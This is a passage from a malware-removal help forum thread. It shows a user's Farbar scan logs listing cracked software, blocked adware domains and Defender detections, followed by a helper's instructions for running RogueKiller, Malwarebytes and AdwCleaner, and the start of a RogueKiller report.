2019-02-08 21:45 - 2019-02-08 21:46 - 000672090 _____ (FAZ ) C:\Users\Thomazing!\AppData\Local\Temp\global_installer.exe
2019-02-08 21:44 - 2019-02-08 21:55 - 002892544 _____ (BitTorrent Inc.) C:\Users\Thomazing!\AppData\Local\Temp\IDM_Serial_Number_Crack_Patch_Free_2019_Serial_Keys.exe
2019-02-08 22:22 - 2019-02-09 08:52 - 000000000 ____D () C:\Users\Thomazing!\AppData\Local\Temp\ImagingEngine.dll
2019-02-08 21:46 - 2019-02-08 21:46 - 000167616 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\symsrv.dll
2019-02-08 21:51 - 2019-02-08 21:47 - 000099906 _____ () C:\Users\Thomazing!\AppData\Local\Temp\Uninstall.exe
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\dllhost.exe => File is digitally signed
C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2019-02-09 13:15
==================== End of FRST.txt ============================
-
February 10th, 2019, 03:30 AM
#11
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 8.02.2019
Ran by Thomazing! (10-02-2019 15:26:00)
Running from C:\Users\Thomazing!\Downloads
Windows 10 Pro 10240.16487 (X64) (2019-02-09 05:18:42)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3408261874-2140888000-2142219774-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3408261874-2140888000-2142219774-503 - Limited - Disabled)
Guest (S-1-5-21-3408261874-2140888000-2142219774-501 - Limited - Disabled)
Thomazing! (S-1-5-21-3408261874-2140888000-2142219774-1001 - Administrator - Enabled) => C:\Users\Thomazing!
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
µTorrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
µTorrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
Alien Team (HKLM-x32\...\{52811919-39BB-4C90-95A6-323FA6636B29}_is1) (Version: 1 - Alien Team)
CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.96 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
IDM Crack 6.25 build 20 (HKLM-x32\...\IDM Crack 6.25 build 20) (Version: build 21 - Crackingpatching.com Team)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.4763.1000 - Microsoft Corporation)
RogueKiller version 13.1.4.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 13.1.4.0 - Adlice Software)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
WinRAR 5.70 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.70.1 - win.rar GmbH)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {25681BAB-9719-40FC-87F6-A290829EB501} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {71E02E5A-83AD-4151-B826-04CEFE0C7B32} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
Task: {9EF0F8A1-4CFA-45BB-8959-8C5455003D37} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2019-02-08] (Synaptics Incorporated -> Synaptics Incorporated)
Task: {E311046B-4383-410D-B613-3788683CA329} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
Task: {EB684CE2-5E4F-4692-B7BC-796F32D5014C} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2019-02-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {FC33DBE7-C910-4F1C-B383-007FD7E6ABC7} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2015-09-10 13:08 - 2015-09-10 13:08 - 000032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 000404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 002498808 _____ () C:\Windows\system32\CoreUIComponents.dll
2015-07-10 11:19 - 2015-07-10 11:19 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 006569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-07-10 11:13 - 2015-09-10 13:08 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 001808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-09-10 13:08 - 2015-09-10 13:08 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2019-02-08 23:02 - 2019-02-06 10:00 - 005186032 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libglesv2.dll
2019-02-08 23:02 - 2019-02-06 10:00 - 000117232 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-31 06:42 - 2019-02-08 21:46 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
If an entry is included in the fixlist, it will be removed.
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\StartupApproved\Run: => "IDMan"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\StartupApproved\Run: => "IDMan"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\StartupApproved\Run: => "IDMan"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{34014409-F047-4511-8A51-E0086652B848}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{EE26B7B5-4F57-4DB5-8AAD-A1A7AEEA5CF8}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{76CDF517-F312-44A8-B7D6-E74702BA4382}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{3F615D37-89C0-45E6-842F-5EB82ECD2C76}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D3020994-C154-42F4-93AA-C0B3C54504AB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{1DE617D9-CAAF-4865-88CC-8B52F2C6CE8C}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{47792053-3338-4A6F-AE9E-447B51B4287A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0A843646-B083-4688-8D3B-A42EB241BEAF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{9A85637C-ABF5-4BC7-8DBF-AEAC9B50890A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{4F5E25DC-8146-46D7-B3C7-DAEBA3A90326}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{2B39C486-2C5E-45FF-B698-F6C65CB96345}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{456C25A6-8A05-4EC5-B99F-03BA6956BF72}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{92C0DFAF-0F89-4F63-A042-BBB6C7AEAE3C}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{D453C330-AB73-4D2F-AEDC-5ACC2FECD2EF}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{76C2B05D-59C7-4F00-A6FA-E3B3EC26DF57}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{A5393F9A-F08B-4AF7-8E8A-5552C87EB8A1}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6A332DC7-031B-46F5-8EE9-4BC596EEC559}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{1EA56DA0-0D98-40D4-9415-02849C00A304}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{12C02EC4-E8CB-4E17-9AE1-270A47450D88}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{38643855-9433-404F-AB1A-5BA1486C3091}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{06C0CE62-896B-4B0A-8B9C-E0E60278B93A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{1FDF2492-B639-4E70-BF09-CD0BA8C38671}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{58AFFE55-6861-4937-A48E-10153B97E5A0}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{ED6ABB3C-84FE-452A-AAB0-92ADAB765B5A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{7DA9684C-3EDF-473F-BE47-0ADBD2E127DC}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{E43D8A77-66E2-47FF-AB3B-01927D6F878D}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
==================== Restore Points =========================
ATTENTION: System Restore is disabled
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (02/09/2019 10:34:47 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 08:39:51 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 08:37:22 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 07:29:04 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 07:03:34 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: cloudnet.exe, version: 7.2.1.1, time stamp: 0x5c5df16a
Faulting module name: KERNELBASE.dll, version: 10.0.10240.16384, time stamp: 0x559f3b2a
Exception code: 0xc0000005
Fault offset: 0x000ffc62
Faulting process id: 0x2648
Faulting application start time: 0x01d4c002846509ab
Faulting application path: C:\Users\Thomazing!\AppData\Local\Temp\csrss\cloudnet.exe
Faulting module path: C:\Windows\SYSTEM32\KERNELBASE.dll
Report Id: 005d774b-7636-4cd7-a6d7-93e91613f789
Faulting package full name:
Faulting package-relative application ID:
Error: (02/09/2019 01:24:26 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 01:22:58 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (02/09/2019 12:44:21 AM) (Source: MsiInstaller) (EventID: 11327) (User: DESKTOP-OHFLJFD)
Description: Продукт: Microsoft.NET -- Ошибка 1327. Недопустимое устройство: G:\
System errors:
=============
Error: (02/09/2019 03:59:54 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/09/2019 01:05:01 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout.
Error: (02/09/2019 01:04:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/09/2019 12:46:24 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout.
Error: (02/09/2019 12:46:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/09/2019 12:46:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Office Software Protection Platform service terminated unexpectedly. It has done this 1 time(s).
Error: (02/09/2019 12:22:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
Error: (02/09/2019 12:20:40 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.
Windows Defender:
===================================
Date: 2019-02-08 22:58:52.037
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:28:36.285
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:22:31.668
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:08:55.987
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
Date: 2019-02-08 22:00:18.323
Description:
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?link...0&enterprise=0
Name: HackTool:Win32/AutoKMS
ID: 2147685180
Severity: Medium
Category: Tool
Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd;file:_D:\Thomas' Backup (1-22-16)\Thomas Entena\Documents\Set-Up\windows 10\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Program Files\WinRAR\WinRAR.exe
Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0
==================== Memory info ===========================
Processor: Pentium(R) Dual-Core CPU T4400 @ 2.20GHz
Percentage of memory in use: 23%
Total physical RAM: 8059.98 MB
Available physical RAM: 6126.46 MB
Total Virtual: 9979.98 MB
Available Virtual: 7991.81 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:97.66 GB) (Free:79.17 GB) NTFS
Drive e: (Abebi) (Fixed) (Total:125.81 GB) (Free:21.43 GB) NTFS
\\?\Volume{134fa4c9-0000-0000-0000-100000000000}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 223.6 GB) (Disk ID: 134FA4C9)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=125.8 GB) - (Type=0F Extended)
==================== End of Addition.txt ============================
-
February 10th, 2019, 03:58 AM
#12
MWB is still busy blocking the malware even after the scan... ampf!
-
February 10th, 2019, 06:45 PM
#13
Avast is fine and it's free.
Download RogueKiller from one of the following links and save it to your Desktop:
Link 1
Link 2
- Close all the running programs
- Double click on downloaded setup.exe file to install the program.
- Click on Start Scan button.
- Click on another Start Scan button.
- Wait until the Status box shows Scan Finished
- Click on Remove Selected.
- Wait until the Status box shows Deleting Finished.
- Click on Report and copy/paste the content of the Notepad into your next reply.
- RKreport.txt could also be found on your desktop.
- If more than one log is produced post all logs.
Please download Malwarebytes to your desktop.
- Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
- Then click Finish.
- Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
- If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
- When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
- Restart your computer when prompted to do so.
- The Scan log is available through History -> Application logs. Please post its contents in your next reply.
Please download AdwCleaner by Xplode and save to your Desktop.
- Double click on AdwCleaner.exe to run the tool (Vista/Windows 7/8/10 users: right-click and select Run As Administrator).
- The tool will start to update the database if one is required.
- Click on the Scan button.
- AdwCleaner will begin...be patient as the scan may take some time to complete.
- After the scan has finished, click on the Logfile button.
- A window will open which lists the logs of your scans.
- Click on the Scan tab.
- Double-click the most recent scan which will be at the top of the list....the log will appear.
- Review the results...see note below
- After reviewing the log, click on the Clean button.
- Press OK when asked to close all programs and follow the onscreen prompts.
- Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
- After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
- To open a Cleaning log, launch AdwCleaner, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
- Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
- A copy of all logfiles is saved to C:\AdwCleaner.
-- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.
-
February 10th, 2019, 07:58 PM
#14
RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 10 (10.0.10240) 64 bits
Started in : Normal mode
User : Thomazing! [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20190204_072850, Driver : Loaded
Mode : Standard Scan, Scan -- Date : 2019/02/11 07:11:47 (Duration : 00:17:22)
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
